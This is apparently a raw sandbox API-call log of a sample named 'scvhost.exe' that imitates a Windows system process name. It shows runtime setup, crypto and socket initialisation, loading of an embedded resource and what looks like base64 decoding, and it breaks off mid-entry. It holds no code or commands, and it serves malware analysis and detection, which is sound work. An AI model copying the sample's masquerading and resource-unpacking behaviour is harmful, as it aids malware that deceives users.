CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ñ←K☈`ﶸ)ნKñ") returned 1 [0089.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ò←K☈`ﶸ)ნKò") returned 1 [0089.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ó←K☈`ﶸ)ნKó") returned 1 [0089.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ô←K☈`ﶸ)ნKô") returned 1 [0089.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="õ←K☈`ﶸ)ნKõ") returned 1 [0089.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ö←K☈`ﶸ)ნKö") returned 1 [0089.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="÷←K☈`ﶸ)ნK÷") returned 1 [0089.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x29fd2d, cbMultiByte=1, lpWideCharStr=0x29fd2e, cchWideChar=1 | out: lpWideCharStr="ø←K☈`ﶸ)ნKø") returned 1 [0089.716] strcmp (_Str1="upper", _Str2="alnum") returned 1 [0089.716] strcmp (_Str1="upper", _Str2="alpha") returned 1 [0089.716] strcmp (_Str1="upper", _Str2="cntrl") returned 1 [0089.716] strcmp (_Str1="upper", _Str2="digit") returned 1 [0089.716] strcmp (_Str1="upper", _Str2="graph") returned 1 [0089.716] strcmp (_Str1="upper", _Str2="lower") returned 1 [0089.716] strcmp (_Str1="upper", _Str2="print") returned 1 [0089.716] strcmp (_Str1="upper", _Str2="punct") returned 1 [0089.716] strcmp (_Str1="upper", _Str2="space") returned 1 [0089.716] strcmp (_Str1="upper", _Str2="upper") returned 0 [0089.716] strcmp (_Str1="lower", _Str2="alnum") returned 1 [0089.716] strcmp (_Str1="lower", _Str2="alpha") returned 1 [0089.716] strcmp (_Str1="lower", _Str2="cntrl") returned 1 [0089.716] strcmp (_Str1="lower", _Str2="digit") returned 1 [0089.716] strcmp (_Str1="lower", _Str2="graph") returned 1 [0089.716] strcmp (_Str1="lower", _Str2="lower") returned 0 [0089.716] strcmp (_Str1="alpha", _Str2="alnum") returned 1 [0089.716] strcmp (_Str1="alpha", _Str2="alpha") returned 0 [0089.716] strcmp (_Str1="digit", _Str2="alnum") returned 1 [0089.716] strcmp (_Str1="digit", _Str2="alpha") returned 1 [0089.716] strcmp (_Str1="digit", _Str2="cntrl") returned 1 [0089.716] strcmp (_Str1="digit", _Str2="digit") returned 0 [0089.716] strcmp (_Str1="xdigit", _Str2="alnum") returned 1 [0089.716] strcmp (_Str1="xdigit", _Str2="alpha") returned 1 [0089.716] strcmp (_Str1="xdigit", _Str2="cntrl") returned 1 [0089.716] strcmp (_Str1="xdigit", _Str2="digit") returned 1 [0089.716] strcmp (_Str1="xdigit", _Str2="graph") returned 1 [0089.716] strcmp (_Str1="xdigit", _Str2="lower") returned 1 [0089.716] strcmp (_Str1="xdigit", _Str2="print") returned 1 [0089.716] strcmp (_Str1="xdigit", _Str2="punct") returned 1 [0089.716] strcmp (_Str1="xdigit", _Str2="space") returned 1 [0089.717] strcmp (_Str1="xdigit", _Str2="upper") returned 1 [0089.717] strcmp (_Str1="xdigit", _Str2="xdigit") returned 0 [0089.717] strcmp (_Str1="space", _Str2="alnum") returned 1 [0089.717] strcmp (_Str1="space", _Str2="alpha") returned 1 [0089.717] strcmp (_Str1="space", _Str2="cntrl") returned 1 [0089.717] strcmp (_Str1="space", _Str2="digit") returned 1 [0089.717] strcmp (_Str1="space", _Str2="graph") returned 1 [0089.717] strcmp (_Str1="space", _Str2="lower") returned 1 [0089.717] strcmp (_Str1="space", _Str2="print") returned 1 [0089.717] strcmp (_Str1="space", _Str2="punct") returned 1 [0089.717] strcmp (_Str1="space", _Str2="space") returned 0 [0089.717] strcmp (_Str1="print", _Str2="alnum") returned 1 [0089.717] strcmp (_Str1="print", _Str2="alpha") returned 1 [0089.717] strcmp (_Str1="print", _Str2="cntrl") returned 1 [0089.717] strcmp (_Str1="print", _Str2="digit") returned 1 [0089.717] strcmp (_Str1="print", _Str2="graph") returned 1 [0089.717] strcmp (_Str1="print", _Str2="lower") returned 1 [0089.717] strcmp (_Str1="print", _Str2="print") returned 0 [0089.717] strcmp (_Str1="cntrl", _Str2="alnum") returned 1 [0089.717] strcmp (_Str1="cntrl", _Str2="alpha") returned 1 [0089.717] strcmp (_Str1="cntrl", _Str2="cntrl") returned 0 [0089.717] strcmp (_Str1="punct", _Str2="alnum") returned 1 [0089.717] strcmp (_Str1="punct", _Str2="alpha") returned 1 [0089.717] strcmp (_Str1="punct", _Str2="cntrl") returned 1 [0089.717] strcmp (_Str1="punct", _Str2="digit") returned 1 [0089.717] strcmp (_Str1="punct", _Str2="graph") returned 1 [0089.717] strcmp (_Str1="punct", _Str2="lower") returned 1 [0089.717] strcmp (_Str1="punct", _Str2="print") returned 1 [0089.717] strcmp (_Str1="punct", _Str2="punct") returned 0 [0089.717] strcmp (_Str1="blank", _Str2="alnum") returned 1 [0089.717] strcmp (_Str1="blank", _Str2="alpha") returned 1 [0089.717] strcmp (_Str1="blank", _Str2="cntrl") returned -1 [0089.717] strcmp (_Str1="blank", _Str2="digit") returned -1 [0089.717] strcmp (_Str1="blank", _Str2="graph") returned -1 [0089.717] strcmp (_Str1="blank", _Str2="lower") returned -1 [0089.717] strcmp (_Str1="blank", _Str2="print") returned -1 [0089.717] strcmp (_Str1="blank", _Str2="punct") returned -1 [0089.717] strcmp (_Str1="blank", _Str2="space") returned -1 [0089.717] strcmp (_Str1="blank", _Str2="upper") returned -1 [0089.717] strcmp (_Str1="blank", _Str2="xdigit") returned -1 [0089.719] strcmp (_Str1="St5ctypeIcE", _Str2="NSt6locale5facetE") returned 1 [0089.719] strcmp (_Str1="St5ctypeIcE", _Str2="NSt6locale5facetE") returned 1 [0089.719] strcmp (_Str1="St5ctypeIcE", _Str2="NSt6locale5facetE") returned 1 [0089.719] strcmp (_Str1="St5ctypeIcE", _Str2="NSt6locale5facetE") returned 1 [0089.719] strcmp (_Str1="St5ctypeIcE", _Str2="NSt6locale5facetE") returned 1 [0089.719] strcmp (_Str1="St5ctypeIcE", _Str2="NSt6locale5facetE") returned 1 [0089.719] strcmp (_Str1="St5ctypeIcE", _Str2="NSt6locale5facetE") returned 1 [0089.719] strcmp (_Str1="St5ctypeIcE", _Str2="NSt6locale5facetE") returned 1 [0089.719] _onexit (_Func=0x408cfc) returned 0x408cfc [0089.720] _onexit (_Func=0x408118) returned 0x408118 [0089.720] _onexit (_Func=0x407df2) returned 0x407df2 [0089.720] _onexit (_Func=0x407de4) returned 0x407de4 [0089.720] _onexit (_Func=0x4075df) returned 0x4075df [0089.720] _onexit (_Func=0x4016be) returned 0x4016be [0089.720] _onexit (_Func=0x412320) returned 0x412320 [0089.721] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0089.721] CryptAcquireContextW (in: phProv=0x6071fc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x6071fc*=0x8bf310) returned 1 [0089.915] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x29fc68, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\scvhost.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\scvhost.exe")) returned 0x29 [0089.916] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\scvhost.exe") returned 0x29 [0089.916] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x29fcdc | out: lpWSAData=0x29fcdc) returned 0 [0089.918] FindResourceW (hModule=0x400000, lpName=0xe, lpType=0xa) returned 0x574048 [0089.918] SizeofResource (hModule=0x400000, hResInfo=0x574048) returned 0x27a2 [0089.920] LoadResource (hModule=0x400000, hResInfo=0x574048) returned 0x574058 [0089.920] LockResource (hResData=0x574058) returned 0x574058 [0089.920] FreeResource (hResData=0x574058) returned 0 [0089.923] strlen (_Str="\\") returned 0x1 [0089.923] strlen (_Str="\\") returned 0x1 [0089.923] strlen (_Str="\\") returned 0x1 [0089.923] strlen (_Str="\\") returned 0x1 [0089.924] strlen (_Str="\\") returned 0x1 [0089.924] strlen (_Str="\\") returned 0x1 [0089.924] strlen (_Str="\\") returned 0x1 [0089.924] strlen (_Str="\\") returned 0x1 [0089.924] strlen (_Str="\\") returned 0x1 [0089.924] strlen (_Str="\\") returned 0x1 [0089.924] strlen (_Str="\\") returned 0x1 [0089.924] strlen (_Str="\\") returned 0x1 [0089.924] strlen (_Str="\\") returned 0x1 [0089.924] strlen (_Str="\\") returned 0x1 [0089.924] strlen (_Str="\\") returned 0x1 [0089.924] strlen (_Str="\\") returned 0x1 [0089.924] strlen (_Str="\\") returned 0x1 [0089.924] strlen (_Str="\\") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.925] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.926] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.927] strlen (_Str="/") returned 0x1 [0089.928] strlen (_Str="\\") returned 0x1 [0089.928] strlen (_Str="/") returned 0x1 [0089.928] strlen (_Str="\\") returned 0x1 [0089.928] strlen (_Str="/") returned 0x1 [0089.930] strlen (_Str="\\") returned 0x1 [0089.930] strlen (_Str="/") returned 0x1 [0089.930] strlen (_Str="\\") returned 0x1 [0089.930] strlen (_Str="/") returned 0x1 [0089.930] strlen (_Str="\\") returned 0x1 [0089.930] strlen (_Str="/") returned 0x1 [0089.930] strlen (_Str="\\") returned 0x1 [0089.930] strlen (_Str="/") returned 0x1 [0089.930] strlen (_Str="\\") returned 0x1 [0089.931] strlen (_Str="/") returned 0x1 [0089.931] strlen (_Str="\\") returned 0x1 [0089.931] strlen (_Str="/") returned 0x1 [0089.933] strlen (_Str="\"") returned 0x1 [0089.934] strlen (_Str="/") returned 0x1 [0089.934] strlen (_Str="/") returned 0x1 [0089.934] strlen (_Str="/") returned 0x1 [0089.934] strlen (_Str="/") returned 0x1 [0089.934] strlen (_Str="/") returned 0x1 [0089.934] strlen (_Str="fc") returned 0x2 [0089.934] strlen (_Str="fc") returned 0x2 [0089.934] strlen (_Str="fc") returned 0x2 [0089.935] strlen (_Str="fc") returned 0x2 [0089.935] strlen (_Str="fi") returned 0x2 [0089.935] strlen (_Str="fi") returned 0x2 [0089.935] strlen (_Str="fi") returned 0x2 [0089.935] strlen (_Str="fi") returned 0x2 [0089.935] strlen (_Str="fi") returned 0x2 [0089.935] strlen (_Str="fi") returned 0x2 [0089.935] strlen (_Str="fi") returned 0x2 [0089.935] strlen (_Str="fi") returned 0x2 [0089.935] strlen (_Str="fi") returned 0x2 [0089.936] strlen (_Str="fi") returned 0x2 [0089.936] strlen (_Str="fi") returned 0x2 [0089.936] strlen (_Str="fi") returned 0x2 [0089.936] strlen (_Str="fi") returned 0x2 [0089.936] strlen (_Str="fi") returned 0x2 [0089.936] strlen (_Str="fi") returned 0x2 [0089.937] strlen (_Str="fi") returned 0x2 [0089.937] strlen (_Str="fi") returned 0x2 [0089.937] strlen (_Str="fi") returned 0x2 [0089.937] strlen (_Str="fi") returned 0x2 [0089.937] strlen (_Str="fi") returned 0x2 [0089.937] strlen (_Str="fi") returned 0x2 [0089.937] strlen (_Str="fi") returned 0x2 [0089.937] strlen (_Str="fi") returned 0x2 [0089.937] strlen (_Str="fi") returned 0x2 [0089.937] strlen (_Str="fi") returned 0x2 [0089.938] strlen (_Str="fi") returned 0x2 [0089.938] strlen (_Str="fi") returned 0x2 [0089.938] strlen (_Str="fi") returned 0x2 [0089.938] strlen (_Str="fi") returned 0x2 [0089.938] strlen (_Str="fi") returned 0x2 [0089.938] strlen (_Str="fi") returned 0x2 [0089.938] strlen (_Str="fi") returned 0x2 [0089.938] strlen (_Str="fi") returned 0x2 [0089.938] strlen (_Str="fi") returned 0x2 [0089.938] strlen (_Str="fi") returned 0x2 [0089.938] strlen (_Str="m") returned 0x1 [0089.939] strlen (_Str="m") returned 0x1 [0089.939] strlen (_Str="e") returned 0x1 [0089.939] strlen (_Str="e") returned 0x1 [0089.939] strlen (_Str="f") returned 0x1 [0089.939] strlen (_Str="f") returned 0x1 [0089.939] strlen (_Str="cb") returned 0x2 [0089.939] strlen (_Str="cb") returned 0x2 [0089.939] strlen (_Str="cb") returned 0x2 [0089.939] strlen (_Str="cb") returned 0x2 [0089.940] strlen (_Str="m") returned 0x1 [0089.940] memchr (_Buf=0x607190, _Val=66, _MaxCount=0x40) returned 0x607191 [0089.940] memchr (_Buf=0x607190, _Val=103, _MaxCount=0x40) returned 0x6071b0 [0089.940] memchr (_Buf=0x607190, _Val=73, _MaxCount=0x40) returned 0x607198 [0089.940] memchr (_Buf=0x607190, _Val=65, _MaxCount=0x40) returned 0x607190 [0089.940] memchr (_Buf=0x607190, _Val=65, _MaxCount=0x40) returned 0x607190 [0089.940] memchr (_Buf=0x607190, _Val=65, _MaxCount=0x40) returned 0x607190 [0089.940] memchr (_Buf=0x607190, _Val=67, _MaxCount=0x40) returned 0x607192 [0089.940] memchr (_Buf=0x607190, _Val=107, _MaxCount=0x40) returned 0x6071b4 [0089.940] memchr (_Buf=0x607190, _Val=65, _MaxCount=0x40) returned 0x607190 [0089.940] memchr (_Buf=0x607190, _Val=65, _MaxCount=0x40) returned 0x607190 [0089.940] memchr (_Buf=0x607190, _Val=66, _MaxCount=0x40) returned 0x607191 [0089.940] memchr (_Buf=0x607190, _Val=83, _MaxCount=0x40) returned 0x6071a2 [0089.940] memchr (_Buf=0x607190, _Val=85, _MaxCount=0x40) returned 0x6071a4 [0089.940] memchr (_Buf=0x607190, _Val=48, _MaxCount=0x40) returned 0x6071c4 [0089.940] memchr (_Buf=0x607190, _Val=69, _MaxCount=0x40) returned 0x607194 [0089.940] memchr (_Buf=0x607190, _Val=120, _MaxCount=0x40) returned 0x6071c1 [0089.940] memchr (_Buf=0x607190, _Val=65, _MaxCount=0x40) returned 0x607190 [0089.940] memchr (_Buf=0x607190, _Val=65, _MaxCount=0x40) returned 0x607190 [0089.940] memchr (_Buf=0x607190, _Val=103, _MaxCount=0x40) returned 0x6071b0 [0089.940] memchr (_Buf=0x607190, _Val=65, _MaxCount=0x40) returned 0x607190 [0089.940] memchr (_Buf=0x607190, _Val=65, _MaxCount=0x40) returned 0x607190 [0089.940] memchr (_Buf=0x607190, _Val=65, _MaxCount=0x40) returned 0x607190 [0089.940] memchr (_Buf=0x607190, _Val=69, _MaxCount=0x40) returned 0x607194 [0089.940] memchr (_Buf=0x607190, _Val=65, _MaxCount=0x40) returned 0x607190 [0089.940] memchr (_Buf=0x607190, _Val=65, _MaxCount=0x40) returned 0x607190 [0089.940] memchr (_Buf=0x607190, _Val=81, _MaxCount=0x40) returned 0x6071a0 [0089.940] memchr (_Buf=0x607190, _Val=66, _MaxCount=0x40) returned 0x607191 [0089.940] memchr (_Buf=0x607190, _Val=122, _MaxCount=0x40) returned 0x6071c3 [0089.941] memchr (_Buf=0x607190, _Val=57, _MaxCount=0x40) returned 0x6071cd [0089.941] memchr (_Buf=0x607190, _Val=73, _MaxCount=0x40) returned 0x607198 [0089.941] memchr (_Buf=0x607190, _Val=116, _MaxCount=0x40) returned 0x6071bd [0089.941] memchr (_Buf=0x607190, _Val=102, _MaxCount=0x40) returned 0x6071af [0089.941] memchr (_Buf=0x607190, _Val=111, _MaxCount=0x40) returned 0x6071b8 [0089.941] memchr (_Buf=0x607190, _Val=97, _MaxCount=0x40) returned 0x6071aa [0089.941] memchr (_Buf=0x607190, _Val=113, _MaxCount=0x40) returned 0x6071ba [0089.941] memchr (_Buf=0x607190, _Val=87, _MaxCount=0x40) returned 0x6071a6 [0089.941] memchr (_Buf=0x607190, _Val=103, _MaxCount=0x40) returned 0x6071b0 [0089.941] memchr (_Buf=0x607190, _Val=82, _MaxCount=0x40) returned 0x6071a1 [0089.941] memchr (_Buf=0x607190, _Val=77, _MaxCount=0x40) returned 0x60719c [0089.941] memchr (_Buf=0x607190, _Val=89, _MaxCount=0x40) returned 0x6071a8 [0089.941] memchr (_Buf=0x607190, _Val=76, _MaxCount=0x40) returned 0x60719b [0089.941] memchr (_Buf=0x607190, _Val=80, _MaxCount=0x40) returned 0x60719f [0089.941] memchr (_Buf=0x607190, _Val=48, _MaxCount=0x40) returned 0x6071c4 [0089.941] memchr (_Buf=0x607190, _Val=98, _MaxCount=0x40) returned 0x6071ab [0089.941] memchr (_Buf=0x607190, _Val=52, _MaxCount=0x40) returned 0x6071c8 [0089.941] memchr (_Buf=0x607190, _Val=116, _MaxCount=0x40) returned 0x6071bd [0089.941] memchr (_Buf=0x607190, _Val=109, _MaxCount=0x40) returned 0x6071b6 [0089.941] memchr (_Buf=0x607190, _Val=74, _MaxCount=0x40) returned 0x607199 [0089.941] memchr (_Buf=0x607190, _Val=99, _MaxCount=0x40) returned 0x6071ac [0089.941] memchr (_Buf=0x607190, _Val=84, _MaxCount=0x40) returned 0x6071a3 [0089.941] memchr (_Buf=0x607190, _Val=89, _MaxCount=0x40) returned 0x6071a8 [0089.941] memchr (_Buf=0x607190, _Val=52, _MaxCount=0x40) returned 0x6071c8 [0089.941] memchr (_Buf=0x607190, _Val=85, _MaxCount=0x40) returned 0x6071a4 [0089.941] memchr (_Buf=0x607190, _Val=110, _MaxCount=0x40) returned 0x6071b7 [0089.941] memchr (_Buf=0x607190, _Val=56, _MaxCount=0x40) returned 0x6071cc [0089.941] memchr (_Buf=0x607190, _Val=75, _MaxCount=0x40) returned 0x60719a [0089.941] memchr (_Buf=0x607190, _Val=88, _MaxCount=0x40) returned 0x6071a7 [0089.941] memchr (_Buf=0x607190, _Val=101, _MaxCount=0x40) returned 0x6071ae [0089.941] memchr (_Buf=0x607190, _Val=114, _MaxCount=0x40) returned 0x6071bb [0089.941] memchr (_Buf=0x607190, _Val=114, _MaxCount=0x40) returned 0x6071bb [0089.941] memchr (_Buf=0x607190, _Val=122, _MaxCount=0x40) returned 0x6071c3 [0089.941] memchr (_Buf=0x607190, _Val=70, _MaxCount=0x40) returned 0x607195 [0089.941] memchr (_Buf=0x607190, _Val=50, _MaxCount=0x40) returned 0x6071c6 [0089.941] memchr (_Buf=0x607190, _Val=90, _MaxCount=0x40) returned 0x6071a9 [0089.941] memchr (_Buf=0x607190, _Val=51, _MaxCount=0x40) returned 0x6071c7 [0089.942] memchr (_Buf=0x607190, _Val=122, _MaxCount=0x40) returned 0x6071c3 [0089.942] memchr (_Buf=0x607190, _Val=87, _MaxCount=0x40) returned 0x6071a6 [0089.942] memchr (_Buf=0x607190, _Val=87, _MaxCount=0x40) returned 0x6071a6 [0089.942] memchr (_Buf=0x607190, _Val=74, _MaxCount=0x40) returned 0x607199 [0089.942] memchr (_Buf=0x607190, _Val=121, _MaxCount=0x40) returned 0x6071c2 [0089.942] memchr (_Buf=0x607190, _Val=122, _MaxCount=0x40) returned 0x6071c3 [0089.942] memchr (_Buf=0x607190, _Val=80, _MaxCount=0x40) returned 0x60719f [0089.942] memchr (_Buf=0x607190, _Val=51, _MaxCount=0x40) returned 0x6071c7 [0089.942] memchr (_Buf=0x607190, _Val=86, _MaxCount=0x40) returned 0x6071a5 [0089.942] memchr (_Buf=0x607190, _Val=120, _MaxCount=0x40) returned 0x6071c1 [0089.942] memchr (_Buf=0x607190, _Val=73, _MaxCount=0x40) returned 0x607198 [0089.942] memchr (_Buf=0x607190, _Val=104, _MaxCount=0x40) returned 0x6071b1 [0089.942] memchr (_Buf=0x607190, _Val=53, _MaxCount=0x40) returned 0x6071c9 [0089.942] memchr (_Buf=0x607190, _Val=43, _MaxCount=0x40) returned 0x6071ce [0089.942] memchr (_Buf=0x607190, _Val=102, _MaxCount=0x40) returned 0x6071af [0089.942] memchr (_Buf=0x607190, _Val=74, _MaxCount=0x40) returned 0x607199 [0089.942] memchr (_Buf=0x607190, _Val=114, _MaxCount=0x40) returned 0x6071bb [0089.942] memchr (_Buf=0x607190, _Val=48, _MaxCount=0x40) returned 0x6071c4 [0089.942] memchr (_Buf=0x607190, _Val=76, _MaxCount=0x40) returned 0x60719b [0089.942] memchr (_Buf=0x607190, _Val=55, _MaxCount=0x40) returned 0x6071cb [0089.942] memchr (_Buf=0x607190, _Val=107, _MaxCount=0x40) returned 0x6071b4 [0089.942] memchr (_Buf=0x607190, _Val=68, _MaxCount=0x40) returned 0x607193 [0089.942] memchr (_Buf=0x607190, _Val=122, _MaxCount=0x40) returned 0x6071c3 [0089.942] memchr (_Buf=0x607190, _Val=117, _MaxCount=0x40) returned 0x6071be [0089.942] memchr (_Buf=0x607190, _Val=120, _MaxCount=0x40) returned 0x6071c1 [0089.942] memchr (_Buf=0x607190, _Val=98, _MaxCount=0x40) returned 0x6071ab [0089.942] memchr (_Buf=0x607190, _Val=101, _MaxCount=0x40) returned 0x6071ae [0089.943] memchr (_Buf=0x607190, _Val=74, _MaxCount=0x40) returned 0x607199 [0089.943] memchr (_Buf=0x607190, _Val=80, _MaxCount=0x40) returned 0x60719f [0089.943] memchr (_Buf=0x607190, _Val=48, _MaxCount=0x40) returned 0x6071c4 [0089.943] memchr (_Buf=0x607190, _Val=90, _MaxCount=0x40) returned 0x6071a9 [0089.943] memchr (_Buf=0x607190, _Val=104, _MaxCount=0x40) returned 0x6071b1 [0089.943] memchr (_Buf=0x607190, _Val=53, _MaxCount=0x40) returned 0x6071c9 [0089.943] memchr (_Buf=0x607190, _Val=81, _MaxCount=0x40) returned 0x6071a0 [0089.943] memchr (_Buf=0x607190, _Val=122, _MaxCount=0x40) returned 0x6071c3 [0089.943] memchr (_Buf=0x607190, _Val=120, _MaxCount=0x40) returned 0x6071c1 [0089.943] memchr (_Buf=0x607190, _Val=88, _MaxCount=0x40) returned 0x6071a7 [0089.943] memchr (_Buf=0x607190, _Val=111, _MaxCount=0x40) returned 0x6071b8 [0089.943] memchr (_Buf=0x607190, _Val=103, _MaxCount=0x40) returned 0x6071b0 [0089.943] memchr (_Buf=0x607190, _Val=106, _MaxCount=0x40) returned 0x6071b3 [0089.943] memchr (_Buf=0x607190, _Val=66, _MaxCount=0x40) returned 0x607191 [0089.943] memchr (_Buf=0x607190, _Val=97, _MaxCount=0x40) returned 0x6071aa [0089.943] memchr (_Buf=0x607190, _Val=116, _MaxCount=0x40) returned 0x6071bd [0089.943] memchr (_Buf=0x607190, _Val=109, _MaxCount=0x40) returned 0x6071b6 [0089.943] memchr (_Buf=0x607190, _Val=73, _MaxCount=0x40) returned 0x607198 [0089.943] memchr (_Buf=0x607190, _Val=82, _MaxCount=0x40) returned 0x6071a1 [0089.943] memchr (_Buf=0x607190, _Val=75, _MaxCount=0x40) returned 0x60719a [0089.943] memchr (_Buf=0x607190, _Val=86, _MaxCount=0x40) returned 0x6071a5 [0089.943] memchr (_Buf=0x607190, _Val=51, _MaxCount=0x40) returned 0x6071c7 [0089.943] memchr (_Buf=0x607190, _Val=69, _MaxCount=0x40) returned 0x607194 [0089.943] memchr (_Buf=0x607190, _Val=57, _MaxCount=0x40) returned 0x6071cd [0089.943] memchr (_Buf=0x607190, _Val=67, _MaxCount=0x40) returned 0x607192 [0089.943] memchr (_Buf=0x607190, _Val=106, _MaxCount=0x40) returned 0x6071b3 [0089.943] memchr (_Buf=0x607190, _Val=54, _MaxCount=0x40) returned 0x6071ca [0089.943] memchr (_Buf=0x607190, _Val=97, _MaxCount=0x40) returned 0x6071aa [0089.943] memchr (_Buf=0x607190, _Val=79, _MaxCount=0x40) returned 0x60719e [0089.943] memchr (_Buf=0x607190, _Val=107, _MaxCount=0x40) returned 0x6071b4 [0089.943] memchr (_Buf=0x607190, _Val=43, _MaxCount=0x40) returned 0x6071ce [0089.943] memchr (_Buf=0x607190, _Val=67, _MaxCount=0x40) returned 0x607192 [0089.943] memchr (_Buf=0x607190, _Val=43, _MaxCount=0x40) returned 0x6071ce [0089.943] memchr (_Buf=0x607190, _Val=100, _MaxCount=0x40) returned 0x6071ad [0089.943] memchr (_Buf=0x607190, _Val=117, _MaxCount=0x40) returned 0x6071be [0089.943] memchr 